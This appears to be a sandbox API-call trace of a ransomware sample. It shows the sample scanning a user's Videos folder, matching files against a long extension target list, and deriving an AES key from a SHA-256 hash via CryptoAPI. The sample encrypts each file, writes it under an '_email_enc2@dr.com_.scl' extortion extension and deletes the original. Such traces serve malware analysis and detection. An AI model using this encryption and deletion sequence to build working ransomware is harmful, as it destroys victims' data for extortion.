	[0200.310] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\"
	[0200.310] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\", lpString2="651iJdW0jxRz3jH.flv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\651iJdW0jxRz3jH.flv") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\651iJdW0jxRz3jH.flv"
	[0200.310] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\651iJdW0jxRz3jH.flv") returned 118
	[0200.310] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0200.310] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\651iJdW0jxRz3jH.flv", cchLength=0x76 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\651ijdw0jxrz3jh.flv") returned 0x76
	[0200.310] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.310] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\651ijdw0jxrz3jh.flv", lpSrch="help_decrypt_your_files") returned 0x0
	[0200.311] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\651ijdw0jxrz3jh.flv" | out: lpString1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\651ijdw0jxrz3jh.flv") returned="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\651ijdw0jxrz3jh.flv"
	[0200.311] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\651ijdw0jxrz3jh.flv") returned 118
	[0200.311] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0200.311] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.311] StrStrW (lpFirst=".flv", lpSrch=".") returned=".flv"
	[0200.312] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.312] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".flv") returned=".flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0200.312] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0200.312] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0200.312] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\651ijdw0jxrz3jh.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\651ijdw0jxrz3jh.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0200.323] ReadFile (in: hFile=0x39c, lpBuffer=0xfdf190, nNumberOfBytesToRead=0x133e4, lpNumberOfBytesRead=0x188c20, lpOverlapped=0x0 | out: lpBuffer=0xfdf190*, lpNumberOfBytesRead=0x188c20*=0x133e4, lpOverlapped=0x0) returned 1
	[0200.327] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.327] CryptAcquireContextW (in: phProv=0x1887d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1887d0*=0xfcb5d8) returned 1
	[0200.330] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.330] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1887d4 | out: phHash=0x1887d4) returned 1
	[0200.330] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.330] CryptHashData (hHash=0xfb9470, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0200.331] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.331] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb9470, dwFlags=0x1, phKey=0x1887d8 | out: phKey=0x1887d8*=0xfb9070) returned 1
	[0200.331] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.331] CryptEncrypt (in: hKey=0xfb9070, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1887ec*=0x133e4, dwBufLen=0x133e4 | out: pbData=0x0*, pdwDataLen=0x1887ec*=0x133f0) returned 1
	[0200.333] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0200.334] RtlMoveMemory (in: Destination=0xff2580, Source=0xfdf190, Length=0x133e4 | out: Destination=0xff2580) 
	[0200.334] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.334] CryptEncrypt (in: hKey=0xfb9070, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff2580*, pdwDataLen=0x1887cc*=0x133e4, dwBufLen=0x133f0 | out: pbData=0xff2580*, pdwDataLen=0x1887cc*=0x133f0) returned 1
	[0200.334] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.334] CryptDestroyKey (hKey=0xfb9070) returned 1
	[0200.335] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.335] CryptDestroyHash (hHash=0xfb9470) returned 1
	[0200.335] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.335] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0200.335] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0200.335] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1887e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1887e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0200.336] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.336] GetUserNameA (in: lpBuffer=0x1886cc, pcbBuffer=0x1887e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1887e4) returned 1
	[0200.338] wsprintfW (in: param_1=0x188800, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\651ijdw0jxrz3jh.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 160
	[0200.339] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\651ijdw0jxrz3jh.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\651ijdw0jxrz3jh.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3a0
	[0200.339] WriteFile (in: hFile=0x3a0, lpBuffer=0xff2580*, nNumberOfBytesToWrite=0x133f0, lpNumberOfBytesWritten=0x188c28, lpOverlapped=0x0 | out: lpBuffer=0xff2580*, lpNumberOfBytesWritten=0x188c28*=0x133f0, lpOverlapped=0x0) returned 1
	[0200.351] CloseHandle (hObject=0x3a0) returned 1
	[0200.351] CloseHandle (hObject=0x39c) returned 1
	[0200.351] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\651ijdw0jxrz3jh.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\651ijdw0jxrz3jh.flv")) returned 1
	[0200.358] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\651ijdw0jxrz3jh.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\651ijdw0jxrz3jh.flv")) returned 0
	[0200.358] FindNextFileW (in: hFindFile=0xfb8eb0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95a78e80, ftCreationTime.dwHighDateTime=0x1d96c2b, ftLastAccessTime.dwLowDateTime=0xaef7a7b0, ftLastAccessTime.dwHighDateTime=0x1d96cfa, ftLastWriteTime.dwLowDateTime=0xaef7a7b0, ftLastWriteTime.dwHighDateTime=0x1d96cfa, nFileSizeHigh=0x0, nFileSizeLow=0x11183, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="hE_M_wDBcnl.flv", cAlternateFileName="HE_M_W~1.FLV")) returned 1
	[0200.359] lstrcmpW (lpString1="hE_M_wDBcnl.flv", lpString2="..") returned 1
	[0200.359] lstrcmpW (lpString1="hE_M_wDBcnl.flv", lpString2=".") returned 1
	[0200.359] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\"
